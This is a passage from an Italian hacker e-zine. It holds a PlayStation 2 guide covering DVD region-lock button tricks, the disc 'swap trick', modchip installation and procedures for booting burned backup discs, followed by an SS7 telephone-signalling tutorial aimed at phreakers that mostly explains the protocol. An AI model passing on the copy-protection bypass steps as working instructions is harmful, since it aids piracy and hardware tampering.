grande maggioranaza di periferiche per PC o MAC. Grazie
a queste due porte è intuibile la grande facilità di
espansione della PS2, che godrà dell'apporto di stampanti,
tastiere, ecc...

* Porta i-link, molto interessante dal punto di vista
tecnologioco, è attualmente utilizzata da molte fotocamere
e telecamere digitali, che potranno essere così collegate
alla macchina.

/\
][ Il pannello posteriore, invece, presenta:
\/_________________________________________________________

* L'interruttore principale di accensione, accende e spegne
fisicamente la PS2.

* Ingresso AC, utilizzato per connettere il dispositivo
alla rete elettrica.

* Uscita multipla AV, per collegare i cavi video.
* Uscita digitale, molto utile per collegare la consolle
ad un impianto Dolby Digital, o qualsiasi altro dispositivo.

* PCMCIA type III, la useremo per collegarci hardware di
tipo PCMCIA, come modem o hard disk, proprio come già fac-
ciamo con i portatili.


+-----------------------------+
---| 2- PROTEZIONE REGIONALE DVD |-------------------------
+-----------------------------+

Come ben sappiamo (e se non lo sapete non me ne fotte un
amato cazzo :) i lettori DVD hanno una protezione regionale:
tale stronzata non ci permette di vedere, ad esempio, i DVD
usa sulla PS2 JAP. Ma... a tutto c'è un rimedio...

---------------------A T T E N Z I O N E ------------------
QUESTO SISTEMA FUNZIONA SOLO CON PS2 SCPH-10000 JAP E SOLO
CON DVD USA.
-----------------------------------------------------------

- HACK #1
Premete e tenete premuti i tasti cerchio, destra e L1.

- HACK #2
Premete e tenete premuto L3 e lo stick energicamente

- HACK #3
*Fate partire il browser della PS2 senza cd nel drive.
*Inserite il cd USA che volete vedere.
*Premete Cerchio e R1 sul DVD.
*Premete destra fino a quando non appare il menu.
*Premete nuovamente cerchio e R1.

- HACK #4
*Caricate il DVD sulla PS2.
*Sulla schermata del browser, selezionate l'icona del cd e
premete e tenete premuti quadrato e cerchio fino a quando
non appare il menu DVD (continuate a tenere premuto).
*Ora potete far partire il filmato in due modi: o con PLAY
o con l'icona MOVIE START. Se una non funziona l'altra
funzionerà.


+---------------+
---| 3- SWAP TRICK |---------------------------------------
+---------------+

/\
][ P R E M E S S A
\/_________________________________________________________

Lo swap trick e lo swap time trick funzionano solo se è
stata applicata la patch apposita. Inoltre come disco di
boot deve essere usato il cd originale "PS2 Utility Disk"
fornito con la macchina. La versione dell'utility disk
non è importante.

- SWAP TRICK

*Rimuovete il coperchio della PS2: fate attenzione ai due
cavi che sono collegati, altrimenti li strapperete via.
Siate delicati!

*Togliete quella specie di disco nero che vedrete appena
aperta la macchina, è fissato con un pò di colla. Sotto
si trova un altro disco, questa volta bianco, ed è quello
che ci interessa; infatti è un disco magnetico che permette
di bloccare il cd. Procediamo quindi con l'eliminare i
pulsanti Reset e Eject semplicemente tirandoli. Ora bisogna
togliere le 4 viti che fissano la protezione del lettore
cd ed estrarre il disco bianco magnetico.

*Collegate tutti i cavi alla PS2, facendo attenzione che
sia spenta prima di fornire l'alimentazione.

*Accendete la macchina, inserite il cd "PS2 Utility Disk"
nel drive e fissatelo con il disco bianco magnetico.
Premete il tasto Reset/Power: il lettore partirà prima a
1x, dopo un secondo andrà a 4x. Adesso dovrete essere molto
veloci dato che il cd sta girando: togliete il disco bianco
e successivamente il disco originale, inserite il disco
masterizzato e rimettete il disco bianco magnetico. DOVETE
fare tutto questo prima che il logo Playstation 2 appaia
sullo schermo.

*Se avete svolto tutto nel migliore dei modi, il vostro cd
masterizzato dovrebbe funzionare. Se così non è, spegnete
la consolle premendo reset per 3-4 secondi e riprovate.
Dovete essere rapidi!!!

+--------------------+
---| 4- SWAP TIME TRICK |----------------------------------
+--------------------+

Se avete incontrato delle difficoltà nell'eseguire lo swap
trick, provate con questa variante a tempo:

* Inserite il solito "PS2 Utility Disk"
* Mettete il disco bianco magnetico
* Guardate i secondi su di un orologio e accendete la PS2
* Aspettate 10 secondi
* Trascorso il tempo, avete dai 5 ai 10 secondi per
cambiare il disco
* Il cd masterizzato dovrebbe funzionare


+--------------------------------+
---| 5- COSTRUIRE UN CHECK DETECTOR |----------------------
+--------------------------------+
f r o m B.A.D / PARADOX

Questo piccolo circuito accende un diodo LED quando la PS2
sta controllando l'autenticita' del CD/DVD (PS2 e PSX): non
e' necessario per eseguire correttamente lo "swap trick",
ma puo risultare utile a tutti coloro che stanno tentando
di raggirare la "boot protection".
Si tratta di un semplice "peak detector" connesso ad una
linea (TP1) su cui transita un treno di impulsi positivi
solamente durante il controllo del cd.

La realizzazione di questo circuito e' banale, l'unica
difficolta' e' la connessione a TP1 a causa delle sue
ridotte dimensioni.

- Lo schema necessario alla realizzazione è negli
allegati. File PS2_check_detector.jpg


+-------------------------+
---| 6- SCHEMA CONNETTORE AV |-----------------------------
+-------------------------+

Grazie a questo schema potrete realizzare un connettore AV
per l'uso che più vi aggrada...

- Lo schema necessario alla realizzazione è negli
allegati. File PS2_av_connector.jpg


+----------------+
---| 7- LA MODIFICA |--------------------------------------
+----------------+

Molta gente mi chiede: "Ma la PS2 si potrà modificare per
farci girare i cd masterizzati come la vecchia PSX ?"
La risposta è a metà tra si e no: infatti se è vero che
esiste la possibilità di modificare la consolle, è anche
vero che tale modifica NON riguarda i giochi su DVD !!!
Al momento non tutti i giochi per PS2 sono su DVDrom, ma
credo che a breve tutti i nuovi titoli usciranno su tale
supporto; perciò la "modifica" attualmente disponibile
servirà solo a far girare i CDrom.
E questo credo che sia un bel problema...
Comunque, andiamo ad analizzare l'attuale modifica per PS2.
Al momento ne esistono 2 tipi: una ci permette di usare
solo titoli per PSX, l'altra entrambi (PS2 e PSX);
ovviamente, a noi interessa la seconda. Sostanzialmente la
modifica è composta da un PIC 12c508B a 18 piedini: chi
effettua già modifiche avrà subito colto la parentela del
chip con lo strafamoso 12c508 o 12c509 (8 piedini)
utilizzato nelle attuali modifiche per PSX. L'installazione
avviene con 11 fili (10 + una resistenza). Negli allegati
troverete un'immagine della scheda, giusto per farvi un'idea
sul montaggio. File PS2_mainboard.jpg


Procedura per il BOOT dei giochi PS2:

1. Installare il chip come da schema
2. Accendere la console PS2
3. Attendere che appaia la schermata di avvio
4. Premere poi OPEN, il bottone a sinistra del carrello CD
5. Inserire il CD di UTILITY che avrete ricevuto con la
console PS2
6. Premere ancora "OPEN" ancora per far richiudere il
carrello
7. Aspettate pochi secondi e vedrete il carrello aprirsi
nuovamente in automatico. A questo punto dovete
togliere il disco utility ed inserire un disco di
backup ENTRO 4 SECONDI!!!
8. Dopo questo il carrello si richiuderà automaticamente e
il gioco parte.

-------------------A T T E N Z I O N E----------------------------------------
I CD PSX2 MASTERIZZATI NECESSITANO DELLA PATCH
PER FUNZIONARE!!!
------------------------------------------------------------------------------

Procedura per il BOOT dei giochi PSX:

1. Installare il chip come da schema
2. Accendere la console PS2
3. Attendere che appaia la schermata di avvio
4. Premere poi OPEN, il bottone a sinistra del carrello CD
5. Inserire un qualsiasi gioco giapponese per PSX sul
carrello che si è aperto
6. Premere ancora OPEN per chiudere il carrello con il
gioco PSX
7. Dopo circa 10 secondi il carrello uscirà in automatico,
a questo punto avete 2 secondi per poter scambiare il
gioco Giapponese con un gioco di backup.
8. Dopo questo il carrello si chiude automaticamente.
9. Pochi secondi dopo il carrello uscirà nuovamente,
bisognerà nuovamente sostituire il gioco di backup con un
gioco originale PSX.
10. Dopo questa operazione il carrello rientra
automaticamente
11. Pochi secondi dopo il carrello uscirà per l'ultima
volta, sostituire il gioco PSX originale con un gioco
PSX di backup entro 2 secondi.
12. Dopo questa operazione il carrello rientrerà per
l'ultima volta e il gioco parte.


Per tutti gli usi utilizzare solo CDR normali
I CDR NERI non funzionano su PS2

+---------------------------+
---| 8- CALIBRAZIONE DEL LASER |----------------------------
+---------------------------+

Perchè calibrare il laser? Molto spesso succede che i cd
masterizzati diano dei problemi, soprattutto nei filmati di
intro; anche il drive DVD stesso può dare noie, come rumori
e fruscii. L'unica cosa da fare consiste quindi nel
calibrare il laser, cosa che già si è vista fare con la PSX.
Partendo dal presupposto che abbiate già provato lo swap
trick, non dovreste più incontrare difficoltà nell'operare
sull'hardware della macchina. Si procede in questo modo:

Aprite la PS2, eliminate le protezioni e la copertura
metallica dalla scheda madre; staccate il cavo del drive DVD
e svitate il drive stesso dalla macchina, eliminandolo.
Capovolgete la console in maniera da avere i connettori di
alimentazione e l'uscita video rivolti verso di voi; ora
ricollegate il cavo del drive DVD. Prendete qualcosa
che abbia una capacità isolante (anche il tappetino del
mouse va bene) e mettetela sulla scheda madre. Ora metteteci
sopra il drive DVD capovolto: dovreste vederne la parte
inferiore. Se così non è, accendete per un attimo la PS2.

Ora potete vedere l'unità laser: qui ci sono due piccoli
resistori variabili, sui quali dovrete intervenire per
calibrare il laser. FATE MOLTA ATTENZIONE: usate un piccolo
giravite e spostate i resistori di POCHISSIMO per volta, per
non peggiorare la situazione. Procedete in questo modo fino
a quando non avrete una visione scorrevole dei vostri cd
masterizzati.



+------+
---| ESCO |-------------------------------------------------
+------+

auFFFff, mi sembra di aver detto tutto quel (poco) che so...
Spero che tale guida vi sia di aiuto nella vostra carriera
di piccoli smanettoni...
Se avete delle novità riguardante la PS2 non esitate a
contattarmi. Arrivederci alla prox. :)


A s A x from W A K I T A
asax2k@yahoo.com www.wakita.cjb.net

------------------------------------------------------------------------------

[ A s A x ]


.----------------------------------------------------------[ PhreaKinG ]-----.
| SS7 TUTORIAL (1a e 2a parte) |
*---------------------------[ Various Artists ]--[]--------------------------*


InF0 hUnTeRz : CancermaN ( 3a parte )
BsThack ( 2a parte )
...e zio`sP3nKy ( 1a parte )

Dedicato agli " smanettoni dei telefoni " :
Gouranga , zapotecz, [Pcrk],
Cancerman,BsThack ,mR_bIs0n,
Martyr che penso sia crepato
e in particolar modo alla
dolcissima anarkika rancida,
alla pikkola anarko-elis4,
Yoghi&michell9 (auguri!) ,
lili1(:*)e alla donna che
e'il detonatore dell'en-
tropia e mia frenetica
silfide..elsa288!

Un Bacione a tutti..anke alla JaMMina, smav, DanteAlig, N0bodY e ad Adryana
che se non mi faceva girare i coyoni non ci saremmo potuti conoscere :*******

*Il Suo Teskio e' Una Bandiera Che Vuol Dire Liberta'*

Non mailate per sfotterci del fatto che cio' che diciamo e' puramente
riciclato da www.microlegend.com ...perche' e' cosi' :)

Se invece abbiamo detto un mare di bufalate skorreggiateci..eteci! :)

sp3nky@freemail.it

- Una semplicissima infarinata.

Il Common Channel Signaling System No.7 (anche chiamato ss7 o c7)
e' il protocollo standard della telecomunicazione mondiale, stabilito
dall'International Telecommunication Union ( ITU ) e dalla Telecommunication
Standardization Sector ( ITU-T ). Lo standard definisce le procedure e il
protocollo dai quali gli elementi nei Public Switched Telephone Network
( PSTN ) scambiano informazioni attraverso un network ( una stazione
telefonica che segnala digitalmente ) per effettuare chiamate su cellulari
( wireless = senza fili ) e telefoni fissi ( wireline = con fili ), routing e
per controllo.

Si sono create nel tempo pero' delle varianti come l'American National
Standard Institute ( ANSI ), Bell Communications Reasearch usati in
Nord America e l'European Telecommunications Standards Institute
( ETSI ) usato in Europa.

I network e il protocollo ss7 sono usati quindi per :

-> Innanzi tutto per la compatibilita' telefonica mondiale e
sikurezza.
-> Servizi gratuiti ( es. numeri verdi : 8oo-123456 ) e servizi
" wireline " ( quindi telefoni fissi ).
-> Tante altre cazzate.


- I Signaling Links.

Le informazioni nel sistema ss7 viaggiano tra base e base ad una velocita' di
56kb/s o 64 kb/s su canali bidirezionali (cio'significa che il messaggio puo'
viaggiare da A a B e da B ad A) chiamati signaling links ( collegamento
tramite segnale ).
Capita che i segnali viaggino fuori-banda ( Out-Of-Band ) anziche' in banda.

Cio' xke' :

-> Un uso + efficiente dei circuiti vocali.
-> Il supporto della rete intelligente ( Intelligent Network ),
quella che in Italia viene usata per i telefoni pubblici.
-> Contro un fraudolento uso del sistema telefonico..hehehe ;)
-> Perche' esistiamo noi apatici assetati di sapere.
-> Per complicarci a tutti la vita.

- Signaling Points.

Ogni signaling points ( punto di segnalazione )e'identificato unicamente da
un codice chiamato Point Code. Questi codici sono trasportati nei " signaling
messages "( ovvero le informazioni che si scambiano i punto di segnalazione )
da signaling points a signaling points per identificare l'origine e la
destinazione di questi messaggi.

Ci sono 3 tipi si Signaling Points nel sistema ss7 :

-> SSP ( Service Switching Point )
-> STP ( Signal Transfer Point )
-> SCP ( Service Control Point )

...e ora osservate la foto vietata ai minori dei 345 anni (luce) :

Figura 1.

Gli SSp sono dei punti del sistema ss7 che originano o terminano chiamate.
Un SSp manda " segnaling messages " agli altri SSp per impostare, dirigere e
"liberare" i circuiti vocali richiesti per terminare una chiamata.
Un SSp potrebbe mandare un messaggio "query" al database centrale ( che
sarebbe l'SCp ) per capire come minchia deve routare la chiamata...cioe' dove
la deve inoltrare...così l'SCp manda un mess (..all'SSp che gli ha rotto i
coyoni ;) kontenente una lista di numeri da chiamare, se trova il primo
occupato oppure se non risponde l'SSp chiama quello dopo e cosi' via..questo
avviene per esempio con i numeri verdi ( toll-free )..mbhe'almeno in Nord
America e' cosi' !! Cmq questa " procedura " varia da servizio a servizio e
da network a network.

Il traffico network che c'e' fra signaling point e signaling point potrebbe
essere routato per via di un " packet switch " ( pacchetto instradato ) dopo
aver contattato un STp che routa a sua volta ogni messaggio entrante su dei
signaling links esterni ( che si basano sull'informazioni contenute nel
messaggio ss7 ). Affinche' avvenga questo, l'STp provvede nella migliore
utilizzazione del network SS7 con l'eliminazione del bisogno per i diretti
collegamenti fra signaling points e signaling points.
Un STp potrebbe effettuare un Global Title Translation...una procedura dalla
quale la destinazione del signaling point e' determinata dalle cifre presenti
nel signaling message ( es. se e' un 034x-xxxxxxx l'STp contattera' un
determinato signaling point...se invece e' un 8oo-xxxxxx ne verra' contattato
un altro ).
L'STp può inoltre comportarsi da "firewall" per monitorare i messaggi ss7
scambiati con altri network.

Dato che il procedimento network ss7 per fare le chiamate e' critico, gli SCp
e gli STp sono di solito ubicati in diversi posti materiali ma con comuni
configurazioni affinche' si ha un sicuro servizio del sistema in caso di
problemi tecnici.
Il traffico e' diviso attraverso i link nel linkset ( cioe' attraverso tutti
i link disponibili del sistema...insomma..sulle basi d'appoggio libere ).

Se uno dei link fallisce il traffico viene riinstradato su un altro link
disponibile nel linkset. Il protocollo ss7 provvede sia alla correzione degli
errori sia all'abilita' di retrasmissione per garantire la funzionalita' nel
caso di eventuali problemi su signaling point o su link.

- Tipi di Signaling Links nel sistema ss7.

I signaling link sono organizzati in link ke vanno dal tipo link A al tipo
link F.

Figura 2.

+--------+------------------------------------------------------------+
| | Un Link A ( access ) connette un signaling end point ( SCp |
| | o SSp ) a un STp. Solo i messaggi ke vengono originati dal |
| Link A | o destinati a un SCp o SSp vengono trasmessi su link A |
| | |
|

  
| |
+--------+------------------------------------------------------------+
| | Un Link B ( bridge ) connette un STp a un altro STp. Gene- |
| | ralmente un quadrangolo di link B connettono tra di loro |
| Link B | uguali o primari STp ( es.l'STp di un network con l'STp di |
| | un altro network ). Il link B e' molto simile al D e vengo-|
| | no kiamati B\D. |
+--------+------------------------------------------------------------+
| | Un Link C ( cross ) connette gli STp performando funzioni |
| | identike. Gli SCp sono disposti anke assieme per migliore |
| Link C | l'affidabilita'. |
| | |
| | |
+--------+------------------------------------------------------------+
| | Un Link D ( diagonal ) connette un STp secondario pari |
| | all'STp primario nel quad-link (la konfigurazione a 4 STp).|
| Link D | Gli STp secondari all'interno dello stesso network sono |
| | connessi tramite te un quad di link D. |
| | |
+--------+------------------------------------------------------------+
| | Un Link E ( extended ) connette un SSp ad un altro STp. |
| | |
| Link E | |
| | |
| | |
+--------+------------------------------------------------------------+
| | Un Link F ( fully associated ) connette due signaling end |
| | point. I link F non sono di solito usati nei network con |
| Link F | l'STp. Nei network senza STp, i link sono direttamente kol-|
| | legati ai signaling point. |
| | |
+--------+------------------------------------------------------------+

- SS7 Protocol Stack.

Le funzioni hardware e software nel sistema SS7 sono divise in livelli.
Ekko una mappa approssimativa dell'OSI ( Open Systems Interconnect )

Figura 3.

- Message Transfer Part.

La Parte di Trasporto del Messaggio (MTP) è divisa in tre livelli:

- MTP Livello 1.

Il livello più basso, MTP Livello 1, è equivalente all'OSI Physical Layer
(Strato fisico OSI). MTP Livello 1 definisce le caratteristiche fisiche,
elettriche, e funzionali del collegamento con segnale digitale. Le interfacce
fisiche definite includono E-1 (2048 kb/s; 32 canali a 64 kb/s), DS-1 (1544
kb/s; 24 canali a 64 kp/s), V.35 (64 kb/s), DS-0 (64 kb/s), e DS-0A (56 kb/s).

- MTP Livello 2.

MTP Livello 2 assicura un'accurata trasmissione da circuito a circuito di un
messaggio attraverso un collegamento di segnale. Il livello 2 implementa
controllo di flusso, validazione della sequenza del messaggio, e controllo
per errori. Quando avviene un errore in un collegamento di segnale, il
messaggio (o il set di messaggi) è ritrasmesso.
MTP Livello 2 è equivalente all'OSI Data Link Layer (Strato collegamento dati
OSI).
Un messaggio SS7 è chiamato un'unità di segnale (SU).
Ci sono 3 tipi di unità di segnale:
Unità di segnale di compilazione [Fill-In Signal Units (FISUs)], Unità di
segnale di stato di collegamento [Link Status Signal Units (LSSUs)], e Unità
di segnale di messaggio [Message Signal Units (MSUs)]

Figura 4.

Le unità di segnale di compilazione (FISUs) sono trasmesse continuamente su
un collegamento di segnale in entrambe le direzioni finchè altre unità di
segnale (MSUs o LSSUs) sono presenti. FISUs portano solo informazioni di
livello basico 2 (per esempio, riconoscimento di unità di segnale ricevuta da
un punto di segnale remoto). Poiché una somma di controllo CRC è calcolato
per ciascuna unità di segnale di compilazione (FISU), la qualità del
collegamento di segnale è controllata continuamente da entrambi i punti di
segnale a ciascuna fine del collegamento.(Nota: Nella variante dell'ITU-T
giapponese, la qualità del segnale dicollegamento è controllata dalla continua
trasmissione di flag octets (8-bit bytes) piuttosto che dalle FISU; le unità
di segnale di compilazione (FISU) sono mandate solo a intervalli di tempo
predefiniti (per esempio una volta ogni 150 millisecondi).

Le unità di segnale di stato di collegamento (LSSUs) portano uno o due
ottetti (8-bit bytes) di informazione sullo stato di collegamento tra i punti
di segnale a ogni fine di collegamento. Lo stato di collegamento è usato per
controllare l'allineamento del collegamento e per indicare lo stato di un
punto di segnale (per esempio, il periodo di interruzione dell'uso del
processore) al punto di segnale remoto.

Le Unità di segnale di messaggio (MSUs) portano tutto il controllo della
chiamata, il database della richiesta e della risposta, l'organizzazione
della rete, e i dati del mantenimento della rete nel campo delle informazioni
di segnale(SIF). Le MSUs hanno un' etichetta di instradamento che permette al
punto che origina il segnale di inviare informazioni al punto di segnale
destinazione attraverso la rete.
Il valore dell'LI (Indicatore di lunghezza) determina il tipo di unità di
segnale:

LI Valore 0 Unità di segnale di compilazione (FISU)1..2 Unità di segnale di
stato del collegamento (LSSU)3..63 Unità di segnale di messaggio (MSU).


- Message Type Length Indicator Value(s).

Il 6-bit LI può registrare valori tra zero e 63. Se il numero di ottetti che
segue l'LI e che precede il CRC è meno di 63, l'LI contiene questo numero.
Altrimenti, l' LI è settato a 63. Un LI di 63 indica la lunghezza del
messaggio è uguale o più grande di 63 ottetti (fino a un massimo di 273
ottetti). La massima lunghezza di un'unità di segnale è 279 ottetti: 273
ottetti (dati) + 1 ottetto (flag) + 1 ottetto (BSN + BIB) + 1 ottetto
(FSN + FIB) + 1 ottetto (LI + 2 bits liberi) + 2 ottetti (CRC).

- Flag.

Il valore binario del flag è 0111 1110. Prima di trasmettere un'unità di
segnale, MTP Livello 2 rimuove "i falsi flag" aggiungendo uno 0-bit dopo ogni
sequenza di cinque 1-bit. Ricevendo u'unità di segnale e togliendo il flag,
MTP Livello 2 rimuove qualsiasi 0-bit seguendo una sequenza di cinque 1-bit
per ripristinare il contenuto originale del messaggio. I flag doppi sono
rimossi attraverso unità di segnale.

BSN (Sequenza del numero a ritroso)
La BSN è usata per mettere a conoscenza del ricevimento di unità di segnale
dal punto di segnale remoto. La BSN contiene la sequenza del numero
dell'unità di segnale che è stata riconosciuta. (vedi sotto FIB.)

- BIB (indicatore di bit al contrario).

Il BIB indica un riconoscimento negativo dal punto di segnale remoto quando
interrotto. (vedi sotto FIB.)

FSN (Sequenza di Numeri in avanzamento)
La FSN contiene la sequenza di numeri dell'unità di segnale. (vedi sotto FIB.)

- FIB (Indicatore di Bit in avanzamento).

Il FIB è usato per recuperare gli errori come il BIB. Quando un'unità di
segnale è pronta per la trsmissione, il punto di segnale incrementa l'FSN
(forward sequence number) di 1 (FSN = 0..127). Il valore del CRC (ciclico
controllo di redondanza) checksum è calcolato e apposto al seguente messaggio.

Ricevendo il messaggio, il punto di segnale remoto controlla il CRC e copia i
valori dell' FSN nel BSN del prossimo messaggio disponibile organizzato per
la trasmissione indietro al punto di segnale di partenza. Se il CRC è
corretto, il messaggio di ritorno è trasmesso. Se non è corretto, il punto di
segnale remoto indica un riconoscimento negativo attivando il BIB a mandare
indietro il messaggio. Quando il punto di segnale originante riceve un
riconoscimento negativo, ritrasmette tutti i messaggi seguenti, iniziando dal
messaggio corrotto, con il FIB inserito.
Siccome il 7-bit FSN può riportare valori tra zero e 127, un punto di segnale
può mandare fino a 128 unità di segnale prima di richiedere riconoscimento
dal punto di segnale remoto. La BSN indica l'ultima sequenza di unità di
segnale ricevuta correttamente dal punto di segnale remoto. La BSN mette a
conoscenza anche di tutte le unità di segnale ricevute precedentemente. Per
esempio, se un punto di segnale riceve un'unità di segnale con BSN = 5
seguito da un altro con BSN = 10 (e il BIB non è inserito), il secondo BSN
implica una ricevuta corretta di unità di segnale 6 anche attraverso 9.



- SIO (Ottetto di Servizio Informazioni).

Il SIO in un MSU contiene il campo di sottoservizio a 4-bit seguito
dall'indicatore di servizio a 4-bit. Le FISU e le LSSU non contengono un SIO.
Il campo di sottoservizio contiene l'indicatore di rete (per esempio
nazionale o internazionale) e la priorità del messaggio (0..3 con 3 che è la
priorità più alta). La priorità del messaggio è considerata solo sotto
condizioni di congestione, non per controllare l'ordine con cui i messaggi
sono trasmessi. I messaggi di bassa priorità possono essere eliminati durante
i periodi di congestione. I messaggi di test del collegamento del segnale
ricevono una più alta priorità piuttosto che i messaggi di preparazione alla
chiamata.
L' indicatore di servizio specifica l'utente MTP, permettendo così la
decodificazione dell'informazione contenuta nel SIF.

- SIF (Campo di Informazione del segnale).

Il SIF in un MSU contiene l' etichetta di instradamento e l'informazione di
segnale (per esempio, SCCP, TCAP, e i messaggi dati ISUP). Le LSSU e le FISU
non contengono né un'etichetta di instradamento, nè un SIO poiché sono
mandate tra due punti di segnale direttamente collegati. Per più informazioni
riguardo le etichette di instradamento, bisogna fare riferimento alla
descrizione dell'MTP Livello 3 che segue.
CRC (Cyclic Redundancy Check - Controllo Ciclico di Redondanza)
Il valore del CRC è usata per trovare e correggere gli errori di trasmissione.
Per più informazioni vedere la descrizione di BIB di seguito.

- MTP Livello 3.

MTP Livello 3 provvede l'instradamento di messaggi attraverso i punti di
segnale nella rete SS7. MTP Livello 3 è equivalente per funzioni all'OSI
Network Layer .
MTP Livello 3 instrada i messaggi basati sulle etichette di instradamento nel
campo di informazione del segnale (SIF) delle unità di senale di messaggio.
L'etichetta di instradamento comprende il destination point code (codice del
punto di destinazione) (DPC), originating point code (codice del punto
originante) (OPC), e signaling link selection (selezione del collegamento di
segnale) (SLS). I codici di punto sono indirizzi numerici che identificano
unicamente ogni punto di segnale nella rete SS7. Quando il codice del punto
di destinazione in un messaggio indica il punto di segnale ricevente, il
messaggio è distribuito alla parte di utenti appropriata (ad esempio, ISUP o
SCCP) indicato dall'indicatore di servizio nel SIO. I messaggi destinati ad
altri punti di segnale sono trasferiti visto che il punto di segnale
ricevente ha capacità di trasferimento messaggi (come un STP). La selezione
di collegamenti verso l'esterno è basata sull'informazione nel DPC e nell'SLS.
Un'etichetta di instradamento ANSI usa 7 ottetti; un ITU-T ne usa 4.

Figura 7.

- ANSI contro ITU-T SIO e SIF.

I codici di punto ANSI usano 24-bits (3 ottetti); i codici di punto ITU-T si
servono usualmente di 14-bits. Per questa ragione, l'informazione di segnale
scambiata tra reti ANSI e ITU-T dev'essere instradata attraverso un gateway
STP, un convertitore di protocollo, o altri punti di segnale che abbiano
codici di punto sia ANSI che ITU-T. (Nota: La Cina usa codici di punto 24-bit
ITU-T che sono incompatibili sia con ANSI che con le altre reti ITU-T).

L'interazione tra reti ANSI e ITU-T è inoltra complicata da diverse
implementazioni di protocolli e procedure di più alto livello.
Un punto di codice ANSI consiste di rete, cluster, e ottetti membri (ad
esempio, 245-16-0). Un ottetto è un byte 8-bit che può contenere qualsiasi
valore tra zero e 255. Telcos e altre grandi reti hanno singoli identificatori
di rete, mentre gli operatori più piccoli hanno un singolo numero di cluster
che hanno all'interno reti da 1 a 4 (e.g., 1-123-9). La rete numero 0 non è
usata; la rete di numero 255 è riservata per uso futuro.
I codici di punto ITU-T sono puri numeri binari che possono essere per zona,
area/rete, e numeri che identificano i punti di segnale. Per esempio, il
punto di codice 5557 (decimale) può essere dichiarato come 2-182-5
(binario 010 10110110 101).


Signaling Link Selection - Selezione del Collegamento di Segnale (SLS)

La selezione dei collegamenti verso l'esterno è basata su informazioni nel
DPC e nel campo di selezione del collegamento. L'SLS è uata per:

* Assicura la sequenza del messaggio. Due messaggi mandati con lo stesso SLS
arriveranno sempre a destinazione nello stesso ordine in cui erano stati
mandati in origine.
* Permette un uguale una condivisione del carico di traffico su tutti i
collegamenti disponibili. In teoria, se una parte utente mandasse messaggi
a intervalli regolari e assegnasse i valori dell' SLS in modo da mandare un
messaggio collettivo da più mittenti, il livello di traffico dovrebbe
essere uguale su tutti i collegamenti (entro set di collegamenti combinati)
in quella destinazione.

Nelle reti ANSI, la grandezza del campo SLS era originariamente 5 bits (32
valori). In configurazioni con due collegamenti in ogni set di link di un set
di link collegati (in totale 4 link), 8 valori SLS erano assegnati a ciascun
link per permettere un pari bilancio di traffico.

Un problema nacque quando le reti in crescita si approvigionarono set di
collegamenti oltre 4 link. Con un SLS di 5 bit, una configurazione con 5 link
in ciascun set di link di un set di collegamenti combinati (in totale 10 link)
risulta un assegnamento irregolare di 3 valori SLS per 8 link e 4 valori SLS
per i 2 link rimanenti.
Per ovviare a questo inconveniente, sia ANSI che Bellcore adottarono un SLS a
8-bit (256 valori) per fornire una migliore condivisione del carico sul
collegamento.
Nelle implementazioni ITU-T, l'SLS è interpretato come il codice di segnale
del collegamento nei messaggi MTP. Nel messaggio della parte utenti telefono
ITU-T, una porzione del codice di identificazione del circuito è immagazzinata
nel campo dell'SLS. MTP Livello 3 reindirizza il traffico via dai link e i
punti di segnale non funzionanti e controlla il traffico in caso di
congestione. Comunque, una discussione dettagliata a riguardo è fuori dai
propositi di questo tutorial.
MTP Livello 2 e 1 possono essere sostituiti da ATM (Asynchronous Transfer
Mode - Modo di trasferimento asincrono), un semplice protocollo broadband
protocol che usa celle di lunghezza fissa di 53 ottetti. MTP Livello 3 si
interfaccia ad ATM usando il Signaling ATM Adaptation Layer (SAAL).
Questa interfaccia è tuttora in studio.

- Parte Utente ISDN.

La parte utente ISDN(ISUP) definisce il protocollo e le procedure usate per
configurare, organizzare, e rilasciare i circuiti di collegamento che portano
chiamate dati e voce attraverso la rete telefonica pubblica (PSTN). ISUP è
usata sia per chiamate ISDN che per quelle non ISDN. Le chiamate che iniziano
e terminano sullo stesso switch non usano il segnale ISUP.

- Basic ISUP Call Control - Controllo di chiamata base ISUP.

La figura 8 rappresenta il segnale ISUP associato a una chiamata base. Quando
la chiamata è indirizzata a un numero fuori dallo switch, l'SSP originante
transmette un messaggio di indirizzo iniziale (IAM) ISUP per riservare un
circuito di collegamento dallo switch originante a quello di destinazione
(1a). Lo IAM include il codice del punto originante , codice del punto di
destinazione, codice di identificazione del circuito (circuito "5" in Fig. 8),
le cifre digitate e, optionalmente, numero e nome della parte chiamante.
Nell'esempio sotto, lo IAM è indirizzato dall'STP dello switch originante allo
switch destinazione(1b). Nota che che lo stesso collegamento(i) è usato per
la durata della chiamata finchè un errore del collegamento forza lo switch a
usare un collegamento di segnale alternativo.

Figura 8.


Lo switch destinazione esamina il numero chiamato, determina ciò che serve
alla parte chiamata, e la disponibilità della linea a squillare. Lo switch
destinazione fa squillare la linea della parte chiamata e trasmette un
messaggio di indirizzo completo (ACM) ISUP allo switch originante (2a)
(attraverso il suo STP) per indicare che la fine remota del circuito di
collegamento è stata riservata. L'STP indirizza l' ACM allo switch originante
(2b) che manda un tono alla parte chiamante e la connette al circuito per
completare il circuito voce fra parte chiamante e quella chiamata.

Nell'esempio mostrato sopra, gli switch di origine e destinazione sono
connessi direttamente con la linea principale. Se gli switches di origine e
destinazione non sono connessi direttamente con la linea principale, lo
switch originante trasmette un IAM per preservare un circuito di collegamento
a uno switch intermedio. Questo manda un ACM mettere a conoscenza della
richiesta di prenotazione del circuito e allora trasmette un IAM per
preservare un circuito di collegamento a un altro switch. Questi processi
continuano finchè tutte le linee per completare il circuito voce dallo switch
originante a quello destinazione sono state prenotate.

Quando la parte chiamata alza la cornetta, lo switch destinazione termina il
tono di chiamata (tu tu) e trasmette un messaggio di risposta (ANM) ISUP allo
switch originante attraverso il suo STP (3a). L' STP indirizza l' ANM allo
switch originante (3b) che verifica che la linea della parte chiamata sia
connessa alla linea riservata e, se così, inizia la tassazione.

Se la parte chiamante riattacca prima, lo switch originante manda un
messaggio di rilascio (REL) ISUP per rilasciare il circuito di collegamento
tra gli switch (4a). L' STP indirizza il REL allo switch destinazione (4b).
Se la parte chiamata riattacca prima, o se la linea è occupata, lo switch
destinazione manda un REL allo switch originante indicando la causa di
rilascio (ad esempio, normale riaggancio o occupato).

Ricevendo il REL, lo switch destinazione disconnette il circuito di
collegamento dalla linea della parte chiamata, mette il circuito in stato di
inattività, e trasmette un messaggio di rilascio completo (RLC) ISUP allo
switch originante (5a) per informare del rilascio del termine remoto del
circuito di collegamento. Quando lo switch originante riceve (o genera) l'
RLC (5b), lo switch termina il ciclo di tassazione e mette il circuito in
